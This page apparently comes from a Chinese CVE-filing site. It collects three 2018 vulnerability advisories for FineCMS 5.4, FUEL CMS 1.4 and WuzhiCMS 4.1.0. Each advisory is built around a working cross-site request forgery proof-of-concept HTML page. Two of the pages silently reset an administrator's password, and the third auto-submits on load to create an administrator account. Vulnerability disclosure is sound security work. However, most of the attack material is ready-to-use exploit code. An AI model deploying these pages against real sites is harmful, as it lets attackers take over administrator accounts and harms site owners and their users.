CVE中文申请站

CVE-2018-18191:Finecms_v5.4存在CSRF漏洞可修改管理员账户密码

一、漏洞摘要

漏洞名称: Finecms_v5.4存在CSRF漏洞可修改管理员账户密码
上报日期: 2018-10-07
漏洞发现者: 踏月留香
产品首页: http://www.finecms.net/
软件链接: http://down.chinaz.com/soft/32596.htm
版本: 5.4
CVE编号: CVE-2018-18191


二、漏洞概述

恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="admin&#64;163&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="admin" />
      <input type="hidden" name="member&#91;phone&#93;" value="18888888888" />
      <input type="hidden" name="member&#91;password&#93;" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/49/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18191
exploit-db:发布中

CVE-2018-16416:FUELCMS 1.4存在CSRF可修改管理员账户密码

一、漏洞摘要

漏洞名称: FUELCMS 1.4存在CSRF可修改管理员账户密码
上报日期: 2018-08-25
漏洞发现者: 惜潮
产品首页: https://github.com/daylightstudio/FUEL-CMS
软件链接: https://github.com/daylightstudio/FUEL-CMS
版本: 1.4
CVE编号: CVE-2018-16416


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而更改管理员账户密码。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
   <input type="hidden" name="first_name" value="admin">
   <input type="hidden" name="last_name" value="admin">
   <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="Save" value="Save">
   <input type="hidden" name="language" value="english">
   <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/48/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16416
exploit-db:发布中

CVE-2018-9926:五指CMS 4.1.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9926


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='form[role][]' value='1' />";
    fields += "<input type='hidden' name='form[username]' value='hack123' />"; 
    fields += "<input type='hidden' name='form[password]' value='' />"; 
    fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; 
    
    var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/6/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926
exploit-db:https://www.exploit-db.com/exploits/44439/